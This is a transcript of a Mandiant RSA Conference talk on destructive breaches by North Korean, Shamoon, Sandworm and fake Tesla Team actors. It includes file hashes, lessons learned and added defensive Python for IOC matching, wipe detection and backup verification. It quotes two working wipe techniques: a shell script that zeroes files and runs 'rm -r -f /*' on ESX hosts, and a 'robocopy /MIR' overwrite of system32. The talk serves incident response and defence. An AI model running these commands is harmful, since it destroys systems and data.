TRANSCRIPT
#RSAC
Lessons Learned from Investigating Disruptive Data Breaches
Session ID: FLE-F01
Vivek Chudgar, Senior Director, Mandiant, @VChudgar
Bart Inglot, Principal Consultant, Mandiant, @BartInglot
Agenda
• Perception of Destructive Breaches
• War Stories
  • Destructive North Korea
  • Troubles in the Persian Gulf
  • Russia vs Ukraine
  • False Flag Attack
• Lessons Learned
Myth-Busting
“IT’S FASCINATING, BUT IT DOESN’T CONCERN ME”
Myth-Busting “Breaches Don’t Happen in All Verticals”
(chart: total industries investigated)
Myth-Busting “Breaches Don’t Happen in Asia Pacific”
Myth-Busting “No Disruptive Breaches in Asia Pacific”
• Ransomware attacks wreak havoc on IT systems around the world
• Notably WannaCry (May 2017) and NotPetya (June 2017)
• Very creative – worm, reuse of cached credentials, WMI and PsExec, bootkit, supply chain attack, etc.
• Was it targeted?
Myth-Busting “Formatting infected systems does the job”
(diagram: phishing campaigns → compromised hosts → corporate network)
(diagram, continued: phishing campaigns → compromised hosts → ? ? ? → accessed hosts inside the corporate network)
Myth-Busting “Formatting infected systems does the job”
• The statistics before (B) and after (A) the enterprise-wide investigation:
  • Unique Malware: B:5 / A:229
  • Stolen Passwords: B:0 / A:51
  • Infected Systems: B:3 / A:154
  • Attacker CnC: B:12 / A:98
Myth-Busting “Formatting infected systems does the job”
• The attackers were present in the environment for 7 years
• Multiple attacker groups with possibly different missions
• The initial infection vector was unknown, gigabytes left the network
• Public and custom tools
  • Backdoors: ZXShell, Gh0stRAT, Metasploit, Zegost, GRILLMARK, etc.
  • Web shells: China Chopper, JspSpy, jFolder, etc.
  • Key loggers, email miners, credential dumpers, tunnelers, etc.
• Compromised VPN credentials
Myth-Busting “Formatting infected systems does the job”
• Unable to perform routine work for a few months
• Several planned IT and transformational projects put on hold
• Service impact – e.g. MSSP’s access was restricted
• Overall, disruptions to “the Business as Usual”
Disruptive Data Breaches
DESTRUCTION / EXTORTION / RANSOM / PWNAGE

Destructive
North Korea Background
• Students chosen from top universities in DPRK
• Well paid in US dollars, free access to the Internet, and have the opportunity to travel outside of DPRK
• Known for causing disruptive attacks
  • DDoS, website defacement, Master Boot Record (MBR) wiping, and publishing stolen data
• Attacks against victims are targeted and deliberate
  • Major attacks against organizations in Asia and North America
  • Ongoing attacks against South Korean media and financial services organizations since 2009
North Korea Destructive Operations
• Multiple variants of malware designed to wipe Windows systems
• Malware was manually deployed by the attackers, but designed to automatically spread
• Malware operated differently depending on the type of system:
  1. Workstation – stopped antivirus and wrote a custom MBR to the disk
  2. Server – disabled Terminal Services
  3. Mail Server – stopped the mail service and disabled Terminal Services
  4. Domain Controllers – disabled Terminal Services and executed the wiper code after a period of time to allow the malware to continue spreading
North Korea Destructive Operations (continued)
• Created script to wipe virtual machines on ESX servers
• The company’s backups were also erased

    find / -type f -name "*.*" | grep -v "disks" | grep -v "\/dev" | awk '{print "ls -l \"" $0 "\"" }' | sh | awk '{if ($5>524288000) print "dd if=/dev/zero of=\"" $9 "\" bs=512k count=400 seek=400 conv=notrunc,noerror > /dev/null 2>&1 &"}' | sh
    sleep 1
    rm -r -f /boot/* &
    rm -r -f /vmfs/* &
    rm -r -f /* &
    rm -f /bin/* /sbin/* &
    exit
North Korea Lessons Learned
• The level of access obtained by DPRK threat actors is no different than what’s obtained by China and Russia-based threat actors
• DPRK motivations are very different
• Ensure the backup environment is segmented from corporate network
Troubles in the Persian Gulf: More MBR Wiping Malware
Shamoon Background
• 2012 – Widely publicised attack on Oil & Gas company in Middle East
• Designed to corrupt files and overwrite the MBR
• Nov 2016 – Recent resurgence targeting Gulf Cooperation Council (GCC) states
• Jan 2017 – Another wave of Shamoon attacks in GCC States
Shamoon November 2016
• The identified malware exhibits destructive behavior on Windows based operating systems
• The malware still uses a signed RawDisk driver from EldoS
File Name       Path                      PE Compile Time       MD5                               File Size
ntssrvr64.exe   %SYSTEMROOT%\System32     2009-02-15 12:32:19   8fbe990c2d493f58a2afa2b746e49c86  717,312
ntssrvr32.exe   %SYSTEMROOT%\System32     N/A                   N/A                               1,349,632
ntssrvr32.bat   %SYSTEMROOT%\System32     N/A                   10de241bb7028788a8f278e27a4e335f  160
gpget.exe       %SYSTEMROOT%\System32     2009-02-15 12:30:41   c843046e54b755ec63ccb09d0a689674  327,680
drdisk.sys      %SYSTEMROOT%\System32     2011-12-28 16:51:29   76c643ab29d497317085e5db8c799960  31,632
key8854321.pub  %SYSTEMROOT%\System32     N/A                   b5d2a4d8ba015f3e89ade820c5840639  782
netinit.exe     %SYSTEMROOT%\System32     N/A                   b9bc61194bfb520c551817904a945840  183,808
netimm173.pnf   %SYSTEMROOT%\INF          N/A                   93b885adfe0da089cdf634904fd59f71  Varies
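As an added example (not part of the presentation), a small Python hunt routine that matches a host's file inventory against the indicator table above; the indicator values are copied from the slide, while the inventory records and the confidence tiers are my own construction:

```python
"""Hunt for the Shamoon (Nov 2016) file indicators from the table above.
Added example, not from the presentation; indicator values are copied from
the slide, the host inventory below is constructed. N/A and "Varies" fields
on the slide are stored as None and matching falls back to the known fields."""
import re

# (file name, directory, MD5 or None, size in bytes or None), taken from the slide table
SHAMOON_IOCS = [
    ("ntssrvr64.exe", r"%SYSTEMROOT%\System32", "8fbe990c2d493f58a2afa2b746e49c86", 717312),
    ("ntssrvr32.exe", r"%SYSTEMROOT%\System32", None, 1349632),
    ("ntssrvr32.bat", r"%SYSTEMROOT%\System32", "10de241bb7028788a8f278e27a4e335f", 160),
    ("gpget.exe", r"%SYSTEMROOT%\System32", "c843046e54b755ec63ccb09d0a689674", 327680),
    ("drdisk.sys", r"%SYSTEMROOT%\System32", "76c643ab29d497317085e5db8c799960", 31632),
    ("key8854321.pub", r"%SYSTEMROOT%\System32", "b5d2a4d8ba015f3e89ade820c5840639", 782),
    ("netinit.exe", r"%SYSTEMROOT%\System32", "b9bc61194bfb520c551817904a945840", 183808),
    ("netimm173.pnf", r"%SYSTEMROOT%\INF", "93b885adfe0da089cdf634904fd59f71", None),
]

def normalize(path):
    """Lower-case a path and map a drive-letter Windows prefix onto the slide's %SYSTEMROOT% form."""
    return re.sub(r"^[a-z]:\\windows", "%systemroot%", path.lower())

def match_inventory(inventory):
    """inventory: (full_path, md5, size) tuples. Returns (full_path, confidence, ioc_name) hits."""
    hits = []
    for full_path, md5, size in inventory:
        directory, _, name = normalize(full_path).rpartition("\\")
        for ioc_name, ioc_dir, ioc_md5, ioc_size in SHAMOON_IOCS:
            if name != ioc_name.lower() or directory != ioc_dir.lower():
                continue
            if ioc_md5 and md5.lower() == ioc_md5:
                conf = "high"      # name, path and hash all match
            elif ioc_size is not None and size == ioc_size:
                conf = "medium"    # name, path and size match (no hash on the slide, or hash differs)
            else:
                conf = "low"       # name and path only: worth a look, not a confirmation
            hits.append((full_path, conf, ioc_name))
    return hits

# Constructed inventory: a clean DLL, drdisk.sys matching by hash, ntssrvr32.exe that can only
# match by name/path/size (no hash on the slide), and a netimm173.pnf matching by name/path only.
SAMPLE_INVENTORY = [
    (r"C:\Windows\System32\kernel32.dll", "d41d8cd98f00b204e9800998ecf8427e", 700000),
    (r"C:\Windows\System32\drdisk.sys", "76C643AB29D497317085E5DB8C799960", 31632),
    (r"C:\Windows\System32\ntssrvr32.exe", "0123456789abcdef0123456789abcdef", 1349632),
    (r"C:\Windows\INF\netimm173.pnf", "ffffffffffffffffffffffffffffffff", 4096),
]
```

A real run would feed the routine an inventory exported from the endpoint tooling rather than the constructed list.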
Shamoon Lessons Learned
• Old tricks can work even years later – the RawDisk driver
• Do not upload to VirusTotal if you suspect a targeted attack
  • Hard-coded credentials
  • Information specific to your business
  • Tip-off to the attackers
Russia vs Ukraine: The Sandworm Team and War
Sandworm Team Background
• Destructive malware impacting Ukrainian Financial Sector (Dec 2016)
• Spearphishing lures w/ a Ministry of Finance theme
• The lure documents were similar to those from prior campaigns that targeted Boryspil Airport, Ukrainian media, and the disrupted Ukrainian utilities
Sandworm Team Destructive Operations
• At least one document was previously used as a Sandworm Team lure:
  • Filename: Додаток №2.xls
  • MD5: b75c869561e014f4d384773427c879a6
Sandworm Team Destructive Operations
• The campaign from Dec 2016 leveraged the STRAYKEY backdoor
• STRAYKEY uses the Telegram API for CnC
• Capabilities:
  • Running remote commands
  • Uploading and exfiltrating files
  • Downloading additional files
Sandworm Team Destructive Operations
• Deployed WHITEROSE – destructive malware, a variant of “KillDisk”
• Ukrainian Government financial agencies affected
• Mr. Robot themed
• Two samples recovered:
  • ffb1e8babaecc4a8cb3d763412294469
  • b75c869561e014f4d384773427c879a6
False Flag Attack: Extortion by the Fake Tesla Team
Fake Tesla Team Background
• Relatively unsophisticated threat, but very disruptive and destructive
• Compromised multiple natural resources and casino organizations in Canada
• Earliest known hacking activity dates back to 2013
Fake Tesla Team Background
• Stole several gigabytes of sensitive data and published it on the Internet (The Pirate Bay, Pastebin.com, Photobucket.com, Justpaste.it, and others)
• Created scheduled tasks to destroy production systems across the enterprise
• Victims endured system outages for multiple days as they recovered data from backups
• Extorted victims to pay ransoms between $50K and $500K (BTC)
Fake Tesla Team False Flags
• The real Tesla Team is believed to be a Serbian hacking group known for DDoS and defacement
• They are unlikely to be targeting Canadian organizations
• The threat actor previously claimed to be a Russian hacking group – “Angels of Truth”
• Likely use of Google Translate to write in Russian
• Claimed to be both “Anonymous Threat Agent” and “Tesla Team” with one victim
Fake Tesla Team Tools, Tactics, and Procedures (TTPs)
• Leveraged publicly available tools like Metasploit and SplinterRAT
• PowerShell used to load simple stagers that connect to CnC
• Custom malware has not been observed
• Multi-year campaigns – observed in one environment for nearly 1.5 years
• Leveraged single factor VPN solutions for remote access
Fake Tesla Team Tools, Tactics, and Procedures (TTPs)
• Backdoors and VPN solution accessed over TOR or compromised IPs
• Known to engage journalists to advertise certain breaches
• Simple, yet effective technique to wipe systems:

    mkdir "C:\emptydir"
    robocopy "C:\emptydir" "C:\windows\system32" /MIR | shutdown /s /t 1800
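An added detection example, not from the presentation: process-creation command lines (constructed here) are checked for the robocopy /MIR wipe shown above, the delayed shutdown that followed it, and the scheduled tasks the group used to stage destruction; the detection names, the system-directory list and the 600-second threshold are my assumptions.

```python
"""Flag process-creation events matching the wipe technique on the slide above:
robocopy mirroring an (empty) directory into a system directory, a shutdown
with a long delay, and scheduled tasks that wrap such commands. Added example,
not from the presentation; the events below are constructed."""
import re

SYSTEM_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}

def tokens(cmdline):
    """Split a Windows command line, keeping double-quoted spans together and dropping the quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def classify(cmdline):
    """Return the detection names that fire for one process command line."""
    toks = tokens(cmdline)
    if not toks:
        return []
    exe = toks[0].lower().rsplit("\\", 1)[-1].removesuffix(".exe")
    args = [a.lower() for a in toks[1:]]
    findings = []
    if exe == "robocopy":
        flags = {a for a in args if a.startswith("/")}
        paths = [a for a in args if not a.startswith("/")]
        dest = paths[1].rstrip("\\") if len(paths) > 1 else ""
        if ("/mir" in flags or "/purge" in flags) and dest in SYSTEM_DIRS:
            findings.append("robocopy_mirror_into_system_dir")   # /MIR from an empty source deletes the target tree
    elif exe == "shutdown" and ("/s" in args or "-s" in args):
        for i, a in enumerate(args[:-1]):
            if a in ("/t", "-t") and args[i + 1].isdigit() and int(args[i + 1]) >= 600:
                findings.append("delayed_shutdown")             # long timer leaves time for the wipe to finish
    elif exe == "schtasks" and "/create" in args:
        if "robocopy" in cmdline.lower() or "shutdown" in cmdline.lower():
            findings.append("scheduled_task_with_destructive_command")
    return findings

def scan(events):
    """events: list of (host, command line). Returns (host, detection) pairs in event order."""
    return [(host, d) for host, cmd in events for d in classify(cmd)]

# Constructed process-creation records: (host, command line)
SAMPLE_EVENTS = [
    ("srv01", r'robocopy "C:\emptydir" "C:\windows\system32" /MIR'),
    ("srv01", "shutdown /s /t 1800"),
    ("fs02", r'robocopy "D:\share\reports" "E:\backup\reports" /MIR /R:1'),   # legitimate mirror job
    ("srv03", r'schtasks /Create /SC ONCE /ST 23:00 /TN "Updater" /TR "robocopy C:\emptydir C:\windows\system32 /MIR"'),
    ("ws17", "shutdown /r /t 0"),                                            # ordinary reboot
]
```

In practice the records come from Sysmon event 1 or Windows 4688 command-line auditing, which must be enabled for the robocopy arguments to be visible at all.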
Fake Tesla Team Lessons Learned
• If you don’t pay, your data will likely be dumped
• They exaggerate their technical skills and ability to access environments
• Partial payments may be able to buy time
Understand that paying the extortion may be the right option in some scenarios, but there are no guarantees the attackers won’t come back for more money or simply leak the data anyway.
Lessons Learned
Responding to disruptive breaches is challenging, and not easy to plan for given the dynamic nature of these attacks and the attackers.
Apply - Lessons Learned (1)
1. Engage experts before a breach (forensic, legal, public relations)
2. Confirm there actually is a breach
3. Establish if you are dealing with a human adversary
4. Remember that timing is critical
5. Keep focused on the incident
6. Consider all options when asked to pay ransom/extortion
7. Think of the ways your network could be accessed
Apply - Lessons Learned (2)
8. Ensure strong segmentation and control over backups
Schrödinger’s Backup: the condition of any backup is unknown until a restore is attempted
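An added example, not from the presentation, that ties this point back to the ESX wiper script earlier in the deck: a restore verification that compares content hashes rather than file presence and size, run against a constructed backup whose restored copy has been zeroed in the middle without truncation (the manifest format and the temporary paths are my assumptions).

```python
"""Restore-and-verify check for a backup set: the manifest records a SHA-256 per
file and verification compares restored *content*, not only presence and size.
Added example, not from the presentation; the scenario below is constructed."""
import hashlib, os, shutil, tempfile

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root):
    """Map each file under root (path relative to root, '/'-separated) to (size, sha256)."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = (os.path.getsize(full), sha256_of(full))
    return manifest

def verify_restore(manifest, restored_root, size_only=False):
    """Return the relative paths in the manifest that fail verification after a restore."""
    failures = []
    for rel, (size, digest) in manifest.items():
        full = os.path.join(restored_root, rel)
        if not os.path.isfile(full) or os.path.getsize(full) != size:
            failures.append(rel)
        elif not size_only and sha256_of(full) != digest:
            failures.append(rel)
    return sorted(failures)

def demo():
    """Back up two files, restore them, then damage one restored copy in place the way
    the ESX wiper earlier in the deck did: zeros written into the middle, no truncation."""
    with tempfile.TemporaryDirectory() as src, tempfile.TemporaryDirectory() as dst:
        os.makedirs(os.path.join(src, "vm"))
        with open(os.path.join(src, "vm", "disk.vmdk"), "wb") as f:
            f.write(bytes(range(256)) * 4096)        # 1 MiB of non-zero content
        with open(os.path.join(src, "notes.txt"), "wb") as f:
            f.write(b"cluster config\n")
        manifest = build_manifest(src)
        shutil.copytree(src, dst, dirs_exist_ok=True)  # the "restore"
        with open(os.path.join(dst, "vm", "disk.vmdk"), "r+b") as f:
            f.seek(512 * 1024)
            f.write(b"\0" * (256 * 1024))             # size unchanged, content destroyed
        return verify_restore(manifest, dst, size_only=True), verify_restore(manifest, dst)
```

The size-only pass reports nothing wrong while the content pass flags the damaged disk image, which is the difference between a backup that exists and one that restores.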
Apply - Lessons Learned (3)
9. After the incident has been handled, immediately focus on broader security improvements
10. If you kick them out, they will return
For additional information, see Mandiant M-Trends 2017 Report:
https://www.fireeye.com/current-threats/annual-threat-report/mtrends.html